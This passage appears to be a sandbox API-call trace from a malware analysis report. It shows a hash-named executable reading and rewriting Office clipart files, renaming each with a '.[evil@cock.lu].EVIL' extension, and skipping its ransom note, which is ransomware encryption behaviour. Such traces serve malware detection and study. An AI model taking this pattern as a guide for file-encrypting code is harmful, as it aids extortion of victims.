dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.093] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xfcff, lpOverlapped=0x0) returned 1 [0130.113] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.113] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.113] _errno () returned 0x84b1160840 [0130.113] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.113] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xfd00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xfd00, lpOverlapped=0x0) returned 1 [0130.113] CloseHandle (hObject=0x1a8) returned 1 [0130.113] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.114] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.114] __uncaught_exception () returned 0x84b1160800 [0130.114] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.114] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099166.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099166.jpg.[evil@cock.lu].evil")) returned 1 [0130.115] ??_V@YAXPEAX@Z () returned 0x1 [0130.117] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG", dwFileAttributes=0x200) returned 0 [0130.118] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.118] wcsstr (_Str="J0099167.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.118] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG") returned 69 [0130.118] wcscmp (_String1="J0099167.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.118] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099167.JPG") returned 0x0 [0130.118] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG") returned 0x45 [0130.118] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099167.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.131] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xabad, lpOverlapped=0x0) returned 1 [0130.144] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.144] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.144] _errno () returned 0x84b1160840 [0130.144] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.144] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xabc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xabc0, lpOverlapped=0x0) returned 1 [0130.144] CloseHandle (hObject=0x1a8) returned 1 [0130.144] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.145] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.145] __uncaught_exception () returned 0x84b1160800 [0130.145] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.145] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099167.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099167.jpg.[evil@cock.lu].evil")) returned 1 [0130.146] ??_V@YAXPEAX@Z () returned 0x1 [0130.148] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG", dwFileAttributes=0x200) returned 0 [0130.148] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.148] wcsstr (_Str="J0099168.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.148] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG") returned 69 [0130.148] wcscmp (_String1="J0099168.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.148] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099168.JPG") returned 0x0 [0130.148] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG") returned 0x45 [0130.149] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099168.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.159] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4ed3, lpOverlapped=0x0) returned 1 [0130.192] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.192] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.192] _errno () returned 0x84b1160840 [0130.192] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.192] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4ee0, lpOverlapped=0x0) returned 1 [0130.193] CloseHandle (hObject=0x1a8) returned 1 [0130.193] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.193] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.193] __uncaught_exception () returned 0x84b1160800 [0130.193] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.193] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099168.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099168.jpg.[evil@cock.lu].evil")) returned 1 [0130.194] ??_V@YAXPEAX@Z () returned 0x1 [0130.197] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG", dwFileAttributes=0x200) returned 0 [0130.197] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.197] wcsstr (_Str="J0099169.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.197] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF") returned 69 [0130.197] wcscmp (_String1="J0099169.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.197] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099169.WMF") returned 0x0 [0130.197] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF") returned 0x45 [0130.197] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099169.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.198] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x27d0, lpOverlapped=0x0) returned 1 [0130.262] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.262] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.262] _errno () returned 0x84b1160840 [0130.262] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.262] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x27e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x27e0, lpOverlapped=0x0) returned 1 [0130.262] CloseHandle (hObject=0x1a8) returned 1 [0130.262] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.262] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.262] __uncaught_exception () returned 0x84b1160800 [0130.262] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.263] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099169.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099169.wmf.[evil@cock.lu].evil")) returned 1 [0130.263] ??_V@YAXPEAX@Z () returned 0x1 [0130.266] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF", dwFileAttributes=0x200) returned 0 [0130.266] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.266] wcsstr (_Str="J0099170.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.266] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF") returned 69 [0130.266] wcscmp (_String1="J0099170.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.266] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099170.WMF") returned 0x0 [0130.266] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF") returned 0x45 [0130.266] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099170.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.268] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5ee4, lpOverlapped=0x0) returned 1 [0130.285] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.285] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.285] _errno () returned 0x84b1160840 [0130.285] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.285] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x5f00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5f00, lpOverlapped=0x0) returned 1 [0130.285] CloseHandle (hObject=0x1a8) returned 1 [0130.285] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.286] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.286] __uncaught_exception () returned 0x84b1160800 [0130.286] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.286] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099170.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099170.wmf.[evil@cock.lu].evil")) returned 1 [0130.287] ??_V@YAXPEAX@Z () returned 0x1 [0130.289] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF", dwFileAttributes=0x200) returned 0 [0130.290] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.290] wcsstr (_Str="J0099171.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.290] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF") returned 69 [0130.290] wcscmp (_String1="J0099171.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.290] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099171.WMF") returned 0x0 [0130.290] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF") returned 0x45 [0130.290] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099171.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.291] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2232, lpOverlapped=0x0) returned 1 [0130.494] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.494] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.494] _errno () returned 0x84b1160840 [0130.494] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.494] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x2240, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2240, lpOverlapped=0x0) returned 1 [0130.494] CloseHandle (hObject=0x1a8) returned 1 [0130.494] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.494] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.495] __uncaught_exception () returned 0x84b1160800 [0130.495] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.495] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099171.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099171.wmf.[evil@cock.lu].evil")) returned 1 [0130.495] ??_V@YAXPEAX@Z () returned 0x1 [0130.498] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF", dwFileAttributes=0x200) returned 0 [0130.498] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.498] wcsstr (_Str="J0099172.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.498] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF") returned 69 [0130.498] wcscmp (_String1="J0099172.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.498] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099172.WMF") returned 0x0 [0130.498] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF") returned 0x45 [0130.498] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099172.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.500] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe392, lpOverlapped=0x0) returned 1 [0130.503] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.503] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.503] _errno () returned 0x84b1160840 [0130.503] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.503] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xe3a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe3a0, lpOverlapped=0x0) returned 1 [0130.503] CloseHandle (hObject=0x1a8) returned 1 [0130.503] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.504] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.504] __uncaught_exception () returned 0x84b1160800 [0130.504] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.504] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099172.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099172.wmf.[evil@cock.lu].evil")) returned 1 [0130.505] ??_V@YAXPEAX@Z () returned 0x1 [0130.507] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF", dwFileAttributes=0x200) returned 0 [0130.507] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.507] wcsstr (_Str="J0099173.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.507] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF") returned 69 [0130.508] wcscmp (_String1="J0099173.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.508] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099173.WMF") returned 0x0 [0130.508] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF") returned 0x45 [0130.508] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099173.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.509] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9114, lpOverlapped=0x0) returned 1 [0130.512] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.512] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.512] _errno () returned 0x84b1160840 [0130.512] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.512] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x9120, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9120, lpOverlapped=0x0) returned 1 [0130.512] CloseHandle (hObject=0x1a8) returned 1 [0130.512] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.512] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.513] __uncaught_exception () returned 0x84b1160800 [0130.513] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.513] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099173.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099173.wmf.[evil@cock.lu].evil")) returned 1 [0130.513] ??_V@YAXPEAX@Z () returned 0x1 [0130.516] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF", dwFileAttributes=0x200) returned 0 [0130.516] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.516] wcsstr (_Str="J0099174.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.516] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF") returned 69 [0130.516] wcscmp (_String1="J0099174.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.516] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099174.WMF") returned 0x0 [0130.516] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF") returned 0x45 [0130.516] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099174.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.518] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1846, lpOverlapped=0x0) returned 1 [0130.521] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.521] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 